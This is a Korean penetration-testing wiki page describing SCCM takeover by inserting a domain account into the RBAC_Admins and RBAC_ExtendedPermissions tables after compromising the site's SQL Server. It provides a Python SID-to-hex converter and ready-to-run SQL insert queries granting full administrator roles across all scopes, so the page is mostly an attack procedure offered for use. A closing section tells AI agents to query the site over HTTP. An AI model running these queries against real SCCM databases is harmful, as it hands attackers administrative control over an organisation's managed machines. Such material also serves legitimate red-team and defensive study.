# Add RBAC Admins

SCCM 서버는 SQL Server 데이터베이스에 저장된 데이터를 기반으로 실행되기 때문에 SCCM 관리자는 서버의 데이터베이스 내 RBAC Admins 테이블에 저장된 유저를 신뢰합니다.

공격자가 SCCM 서버의 SQL Server에서 관리자 권한을 탈취하는데 성공했다면 데이터베이스를 조작하여 RBAC\_Admins 테이블에 새로운 데이터를 추가하여 SCCM 관리자를 탈취할 수 있습니다.

## Abuse

{% code title="hex ↔ SID 변환 코드" %}

```python
#!/usr/bin/env python3
import argparse
import struct
import re
import sys

def hex_to_sid(hex_str: str) -> str:
    hex_str = hex_str.replace("0x", "").replace(" ", "").strip()
    data = bytes.fromhex(hex_str)
    revision = data[0]
    sub_authority_count = data[1]
    identifier_authority = int.from_bytes(data[2:8], 'big')
    sub_authorities = [struct.unpack("<I", data[8 + i*4:12 + i*4])[0] for i in range(sub_authority_count)]
    sid_str = f"S-{revision}-{identifier_authority}-" + "-".join(str(x) for x in sub_authorities)
    return sid_str

def sid_to_hex(sid_str: str) -> str:
    parts = sid_str.strip().split('-')
    if len(parts) < 4 or parts[0].upper() != 'S':
        raise ValueError("SID 형식이 올바르지 않습니다. (예: S-1-5-21-...)")
    revision = int(parts[1])
    identifier_authority = int(parts[2])
    sub_authorities = list(map(int, parts[3:]))
    data = bytearray()
    data.append(revision)
    data.append(len(sub_authorities))
    data += identifier_authority.to_bytes(6, 'big')
    for sub in sub_authorities:
        data += struct.pack("<I", sub)
    return "0x" + data.hex()

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", required=True, help="Input SID or HEX")
    args = parser.parse_args()
    user_input = args.input.strip()

    try:
        if re.match(r'^(0x)?[0-9a-fA-F\s]+$', user_input):
            print(f"[+] 입력값은 HEX로 감지됨")
            print(f"SID → {hex_to_sid(user_input)}")
        elif user_input.upper().startswith("S-"):  
            print(f"[+] 입력값은 SID로 감지됨")
            print(f"HEX → {sid_to_hex(user_input)}")
        else:
            print("[-] 입력 형식이 올바르지 않습니다. SID 또는 HEX 값을 입력하세요.")
            sys.exit(1)

    except Exception as e:
        print(f"[-] 오류 발생: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()
```

{% endcode %}

SCCM 관리자로 추가하려는 도메인 계정의 SID 값을 위 파이썬 코드를 통해 hex로 변환합니다. 변환기를 통해 나온 hex 값과 도메인 계정을 아래 쿼리에 삽입하여 SCCM 서버의 SQL Server에서 실행합니다.

{% code title="RBAC\_Admins 그룹원 등록 쿼리" %}

```sql
INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT '<user-sid-hex>', '<domain\user>', 0, 0, '', '', '', '', '<site-code>' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = '<domain\user>' );
INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'contoso\test'), RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'contoso\test')  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );
```

{% endcode %}

## Demo

<figure><img src="/files/xqLjPaOKKK6agMno593y" alt=""><figcaption></figcaption></figure>

## References

{% embed url="<https://www.truesec.com/hub/blog/sccm-tier-killer>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentestwiki.com/active-directory/sccm/add-rbac-admins.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.